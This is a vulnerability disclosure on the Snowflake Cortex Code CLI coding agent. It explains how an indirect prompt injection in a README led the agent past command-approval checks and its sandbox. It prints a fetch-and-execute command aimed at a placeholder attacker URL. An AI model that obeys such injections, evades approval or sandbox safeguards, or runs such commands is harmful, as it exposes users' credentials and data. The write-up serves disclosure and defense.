Snowflake Cortex Code CLI: Sandbox Escape and RCE

Snowflake Cortex Code CLI: Sandbox Escape and RCE ')" class="framer-18tjoct" aria-hidden="true"> Solutions ')" class="framer-h2c46l" aria-hidden="true"> Industries ')" class="framer-h2c46l" aria-hidden="true"> Partners Resources ')" class="framer-h2c46l" aria-hidden="true"> Book a Demo ')" class="framer-14swm3k" aria-hidden="true"> ')" class="framer-18tjoct" aria-hidden="true"> ')" class="framer-18tjoct" aria-hidden="true"> Threat Intelligence Table of Content Snowflake Cortex Code CLI: Sandbox Escape and RCE A vulnerability in the Snowflake Cortex Code CLI allowed malware to be installed and executed via indirect prompt injection, bypassing human-in-the-loop command approval and escaping the sandbox. Context The Snowflake Cortex Code CLI is a command-line coding agent that operates similarly to Claude Code and OpenAIâs Codex, with an additional built-in integration to run SQL in Snowflake. Two days after release, a vulnerability was identified in Cortex Codeâs command validation system that allowed specially constructed malicious commands to: Execute arbitrary commands without triggering human-in-the-loop approval steps Execute those commands outside of the Cortex CLIâs sandbox. We demonstrate that, via indirect prompt injection, an attacker could manipulate Cortex to download and execute scripts without approval that leverage the victimâs active credentials to perform malicious actions in Snowflake (e.g., Exfiltrate data, drop tables). The Snowflake security team worked diligently to validate and remediate this vulnerability, and a fix was released with Cortex Code CLI version 1.0.25 on February 28th, 2026. Snowflakeâs full advisory is available within the Snowflake Community Site, which is accessible to customers, partners, and the general public upon creation of a Community account: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response The Attack Chain A user opens Cortex and turns on the sandbox The user starts the CLI and chooses to enable one of the sandbox modes (details below). This attack is not contingent on which of the sandbox modes is used. Note: This attack chain also applied to non-sandbox users. Documentation indicates that in OS+Regular mode, all commands prompt for user approval. Commands run in the sandbox also have network and file access restrictions. The user asks Cortex for help with a third-party open-source codebase In this chain, a prompt injection is hidden in the README of an untrusted repository that the user has found online. However, in practice, an injection can be ingested from any untrusted data, such as in a web search result, database record, terminal command output, or MCP response. *Note: Cortex does not support âworkspace trustâ, a security convention first seen in code editors, since adopted by most agentic CLIs. Workspace trust dialogs warn users of the risks involved when using an agent in a new, potentially untrusted directory. Cortex explores the repository and encounters the prompt injection The subagent that Cortex has invoked to explore the repository finds the README file. At the bottom of the file, there is a prompt injection that manipulates Cortex into believing that it must run a dangerous command. Human in the loop is bypassed Cortex failed to validate commands inside process substitution expressions, allowing unapproved execution of the malicious command cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) . The command downloads a script from an attackerâs server and executes it. Hereâs how the bypass worked: Any shell commands were executed without triggering human approval as long as: (1) the unsafe commands were within a process substitution <() expression (2) the full command started with a âsafeâ command (details below) Background on the validation system: The command validation system works by deconstructing a full command requested by the model into individual commands (e.g., cat , echo , sh , wget , etc). The individual commands are compared against a âsafeâ command system built into Cortex. When all the components of a command are âsafeâ, the full command executes without approval; otherwise, the user is prompted for consent. Because commands in process substitution expressions were not evaluated by this system, they never triggered human approval. When combined with a command that automatically executed as âsafeâ under the validation system, the flaw resulted in arbitrary command execution without user approval. The sandbox is bypassed Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed. Below, the flag is visible in the log of commands run by Cortex: This flag is intended to allow users to manually approve legitimate commands that require network access or access to files outside the sandbox. With the human-in-the-loop bypass from step 4, when the agent sets the flag to request execution outside the sandbox, the command immediately runs outside the sandbox, and the user is never prompted for consent. Note: there is a setting users can explicitly configure if they would like to disable this functionality, which would prevent the bypass. Malware is downloaded and executed outside the sandbox Cortexâs subagent invokes the malicious command and sets the flag for unsandboxed execution. The command downloads a shell script from an attackerâs server and executes it. The bypasses in steps 4 and 5 cause the command to execute immediately outside the sandbox without requiring user consent. Below, we examine the impact an attacker can achieve through this remote code execution. Impacts With remote code execution on a victimâs device, the attacker can execute arbitrary code to cause harm on the victimâs computer, even targeting files outside Cortexâs sandbox. The attacker knows the victim has Cortex Code installed, making the victimâs active connection to Snowflake an enticing target for further exploitation. By leveraging cached tokens Cortex uses to authenticate to Snowflake, attackers can: Steal database contents Drop tables Add malicious backdoor users to the Snowflake instance Lock legitimate users out with network rules Here, we show that the malicious script can reliably find and use cached tokens stored by Cortex to execute SQL queries with the privileges of the Cortex user. With a developer as the victim, this likely means read-write access to tables (data exfiltration and destruction); for a more privileged user, the ramifications can be more severe. Below, the malicious script run by Cortex exfiltrates and then drops all tables in the Snowflake instance. Note: Snowflake defaults to and recommends browser-based authentication, which yields sessions scoped to the userâs access level. Users can restrict the role the agent uses when executing SQL, but the Cortex program itself (and therefore, the attacker) still has full access. Subagent Context Loss Exacerbates Risks During one execution of this attack, Cortex invoked multiple subagents to explore the repo. The first subagent invoked another subagent, which ran the malicious commands. During the process of reporting back from subagent to subagent to main agent, context was lost. This resulted in the main Cortex agent reporting to the user that a malicious command was found and advising them not to run it. Cortex failed to inform the user that the command had already been run by the second-level sub-agent! Responsible Disclosure This vulnerability was responsibly disclosed to Snowflake on Feb 5th, three days after Cortex Code was released. The Snowflake team engaged in prompt discourse and coordinated dutifully throughout the remainder of February until the vulnerability was validated and remediated. Note that as LLMs are stochastic, during testing, we observed ~50% efficacy for this attack. This underscores the importance of training security teams on non-deterministic attacks in LLM systems. Snowflake has indicated that the fix is automatically applied through an automatic update when customers next launch Cortex. Snowflakeâs Advisory is available for review within the Snowflake Community Site, which is accessible to customers, partners, and the general public upon creation of a Community account: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response Timeline Feb 02, 2026 - Snowflake Cortex Code is released Feb 05, 2026 - PromptArmor submits responsible disclosure Feb 06-20, 2026 - Snowflake coordinates with PromptArmor on further details Feb 12, 2026 - Snowflake validates the vulnerability Feb 28, 2026 - Snowflake deploys a fix with the 1.0.25 Cortex Code release Mar 16, 2026 - Coordinated public disclosure by PromptArmor and Snowflake On this page Label